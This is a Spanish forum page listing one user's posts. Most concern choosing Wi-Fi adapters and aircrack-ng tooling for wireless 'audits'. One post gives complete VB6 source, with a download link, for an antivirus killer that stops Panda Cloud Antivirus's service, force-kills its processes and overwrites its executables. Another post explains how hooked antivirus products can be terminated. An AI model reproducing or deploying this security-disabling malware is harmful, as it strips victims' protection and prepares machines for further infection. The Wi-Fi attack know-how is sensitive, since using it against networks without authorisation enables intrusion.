Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mad Antrax

#601
Buenas, yo me acabo de comprar la Alfa 1W + 5dbi antenna en ciudadwireless, y creo que es la mejor tarjeta que puedes comprarte.

La tarjeta 1) y la 2) son exactamente lo mismo, la única diferencia es que la 1) trae una antena de 2dbi y la 2) trae una antena de 5dbi. En resumidad cuentas: La mejor opción es la 2) Alfa Network AWUS036H V5 Adaptador USB Wireless 1W con Antena de 5dBi-54Mbps - 802.11b/g - Conector RP-SMA

http://www.ciudadwireless.com/alfa_network_awus036h_adaptador_wireless_antena_5dbi-54mbps_802-11b-g_conector_rp-sma-p-3355.html

Por otra parte, la antena 3) es una eRize, de 1W igual y con antena de 5dbi, te dejo una comparativa entre las 2 tarjetas, con gráficos y todo:

http://foro.seguridadwireless.net/adaptadores-wireless-usb/comparativa-alfa-1w-vs-erize-1w/

(De todas formas, la mejor compra es la tarjeta 2) que has puesto justo arriba)
#602
Las tarjetas con RJ45 con tarjetas Ethernet. Para la auditoría wireless necesitas tarjetas Wifi en lugar de Ethernet.

Te dejo un listado de tarjetas compatibles para las auditorías (hay más, pero éstas son las más comunes)

http://hwagm.elhacker.net/htm/tarjetas.htm
#603
Gracias por contestar.

Por el momento dejaré puesta la RT2500 (me lo ha recomendado ChimoC) y haré pruebas.

Ayer atacando mi propio AP conseguí hacer ChopChop sin cliente con dicho chipset. El ataque de fragmentación sin cliente no me salió :_( De todas formas tengo que seguir investigando y documentandome en dichos ataques... por cierto, alguien tiene algún link o manual actualizado que hable sobre dichos ataques? Utilizo el airoscript y me vendría bien algún manual, tuto o video que explique como realizar esos 2 ataques usando el airoscript (sin usar comandos).

Saludos y gracias.
#604
Nadie me responde? :huh:

La duda que tengo es sencilla: Tengo la posibilidad de auditar con una RT2500 o una ipw2200, cual de esas 2 tarjetas me recomendáis? Cual es más compatible con todos los ataques? (fragmentación, chopchop, etc...)

Por otra parte, he actualizado el airrack-ng a la versión 1.1 y me he descargado un modulo de airoscript compatible para trabajar con los ficheros dump-01.csv en lugar de los *.txt ¿Necesito actualizar algo más para que funciona todo correctamente? ¿Me recomendáis actualizar algún módulo/herramienta más?
#605
Hola a todos, llevo un tiempo mirando y leyendo ésta sección del foro orientado a la auditoría wireless y tengo un par de dudas que espero alguien me pueda resolver:

Actualmente dispongo de un equipo portátil para "batallas", al cual he instalado el WifiWay 1.0 final en el propio HDD, así como algunos módulos actualizados para disponer de las últimas versiones de todas sus herramientas. Aquí viene mi primera duda:



Actualmente el portatil viene equipado con esa tarjeta (Ralink RT2500), el WifiWay me la detecta correctamente, puedo ponerla en modo monitor e inyectar.

Como tengo la suerte de trabajar de informático en mi empresa, he podido desmantelar otro equipo portátil y extraer su tarjeta wifi para mi uso personal (una Intel ipw2200)



Puedo instalar cualquiera de las 2 tarjetas en mi portatil, y al arrancar el WifiWay me las detecta sin problemas... aquí vienen mis preguntas:

1) Que tarjeta me recomendáis que deje instalada? Cual de las 2 es mejor para auditar e inyectar? He oído que para las ipw2200 se necesita un airoscript diferente, etc.... ¿Si vosotros pudierais escoger una de esas 2 tarjetas para vuestro uso, cual es quedariais?

2) Actualmente mi versión de WifiWay 1.0 que tengo instalado en el HDD viene con el aircrack-ng versión 0.7 (creo). Soy consciente que ha salido la versión 1.0 RC4 y la 1.1... Me recomendáis que actualice el módulo de aircark-ng que viene en el propio WifiWay? De ser así.. que versión me recomendáis?

3) En el caso de que alguien me recomiende actualizar... ¿Las herramientas que dependel del aircrack-ng (como por ejemplo el airoscript) me seguirán funcionando con la versión actualizada del aircrack-ng?

En principio esas son mis 3 dudas que tengo. Por lo demás voy avanzando en mis auditorias. Tengo las herramientas de WLANdecrypter y jazzteldecrypter actualizadas a la 1.3.1 y 2 (respectivamente), ya que son las que más utilizo. Por otra parte estoy abierto a sujerencias de nuevas herramientas que me puedan venir bien para esos 2 chipsets de los que dispongo.

He leído mucho ya por el foro, pero algunos tutorial que leo son algo antiguos y hablan de programas o procesos desfasados por completo, es por eso que me he animado a abrir éste thread para conseguir información actual.

Gracias :)
#606
Cita de: Arcangel_0x7C5 en  6 Mayo 2009, 04:49 AM
El nod32 v4 no se deja matar asi y el karpesky tampoco. habra mas pero yo solo se esos. La forma de matarlos es quitando los hook en las apis de terminar procesos

Exacto, me cito a mi mismo:

Cita de: ||MadAntrax|| en  5 Mayo 2009, 23:27 PM
Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...).

Por eso, y aprovechando la ocasión, recomiendo utilizar sistemas de protección basados en drivers (a nive de Ring0 mejor) y Hook's. Como por ejemplo Kaspersky, NOD32, AVG y Avira... los demás son una m1erda de AV.

Saludos.
#607
Bueno, primero quiero aclarar que este programa/source no entra dentro del "concurso de desarrollo de malware de Abril Negro 2009". Pero sí entra dentro del boletín para Abril Negro 2009, como prueba de concepto...

Anti Cloud Antivirus by MadAntrax :P

He diseñado una simple función que aprovecha los comandos típicos de Windows (taskkill, net, etc...) y los he aplicado en forma de bucles FOR y Sleep's para generar un AV-Killer genérico. En éste caso lo he diseñado para el nuevo Cloud Antivirus de Panda



Que es Cloud Antivirus?

Es el nuevo antivirus gratuito desarrollado por Panda, usando un método de programación que evita sobrecargar la CPU del usuario (Cloud Computing). He analizado el AV y he decidido crear un AV Killer para "matar" el nuevo producto de Panda.

:http://www.cloudantivirus.com/default.aspx?lang=spa
:http://es.wikipedia.org/wiki/Computaci%C3%B3n_en_nube

El source del programa es el siguiente:

modAntiCloudAV.bas
Código (vb) [Seleccionar]
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Function StopService(ByVal sName As String) As Boolean
    On Error Resume Next
    Dim i As Integer
   
    For i = 1 To 3
        Shell "net stop " & sName, vbHide
        Sleep 250
    Next i
    Sleep 1000
    DoEvents
    StopService = True
End Function

Function DestroyFile(ByVal sFileName As String, ByVal sFilePath As String) As Boolean
    On Error Resume Next
    Dim i As Integer
   
    For i = 1 To 3
        Shell "taskkill /F /IM " & sFileName, vbHide
        Sleep 250
    Next i
    Sleep 1000
    DoEvents
   
    For i = 1 To 3
        Open sFilePath For Output As #1
            Print #1, "destroyed!"
        Close #1
        Sleep 10
    Next i
    DoEvents
    DestroyFile = True
End Function


Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...). Para usar el módulo y matar CloudAV se utiliza así:

Código (vb) [Seleccionar]
Private Sub CommandXP1_Click()
    On Error Resume Next
   
    Dim WShell As Object
    Dim CloudPath As String
   
    CommandXP1.Enabled = False
    Set WShell = CreateObject("WScript.Shell")
        CloudPath = WShell.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Panda Security\Nano Av\Setup\Path")
    Set WShell = Nothing
   
    If CloudPath = "" Then
        MsgBox "No se ha encontrado Cloud Antivirus instalado en el sistema", vbExclamation, "Anti-CloudAV"
    Else
        StopService "NanoServiceMain"
        DoEvents
        DestroyFile "PSUNMain.exe", CloudPath & "PSUNMain.exe"
        DoEvents
        DestroyFile "PSANHost.exe", CloudPath & "PSANHost.exe"
        DoEvents
        DestroyFile "PSANToManager.exe", CloudPath & "PSANToManager.exe"
        DoEvents
        'CloudAV destroyed
        MsgBox "Proceso finalizado correctamente, comprueba si tu CloudAV sigue funcionando", vbInformation, "Anti-CloudAV"
    End If
    CommandXP1.Enabled = True
End Sub


El source es mejorable, se puede modificar para que no haga tantos bucles ni tantos sleep's y mejorar la rápidez. Pero como es una prueba de concepto... prefiero dejarlo así para evitar posibles copy&paste de noob's. Los que quieran usar ésta técnica tendrán la oportunidad de programarse correctamente un modulo más eficiente (evitar usar el objecto WScript, no usar Shell, cifrar las String's, control de errores, etc...)

;)

LINK DE DESCARGA: antiCloudAV (Fichero Compilado + Source en VB6)

Saludos.
#608
Abril negro / Re: Black Netbios Attack
29 Abril 2009, 00:22 AM
Cita de: cheatmaster en 29 Abril 2009, 00:20 AM
por cierto aun te conectas con el e mail "a*k*n" ? pongo * por si las moscas :P

Sí, pero hice una "limpiza nuclear" y me quedé con solo 50 contactos en la lista, supongo que te eliminé porque no sabia quien eras... xD
#609
Abril negro / Re: Black Netbios Attack
29 Abril 2009, 00:10 AM
Anda... agradecimientos a MadAntrax? Por que?
#610
Que guay! Aprovecharé este concurso para publicar mi nueva tool: Cactus Ofuscator 1.0 A ver si lo termino pronto... :P